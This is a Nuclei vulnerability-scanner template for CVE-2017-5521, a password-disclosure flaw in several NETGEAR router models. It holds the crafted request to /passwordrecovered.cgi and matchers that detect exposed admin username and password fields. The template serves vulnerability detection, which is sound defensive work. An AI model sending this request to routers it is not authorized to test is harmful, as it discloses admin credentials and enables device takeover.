id: CVE-2017-5521
info:
  name: Bypassing Authentication on NETGEAR Routers
  author: princechaddha
  severity: high
  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
  reference:
    - https://www.cvedetails.com/cve/CVE-2017-5521/
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
  tags: cve,cve2017,auth-bypass
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.10
    cve-id: CVE-2017-5521
    cwe-id: CWE-200

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and
        part: body
      - type: status
        status:
          - 200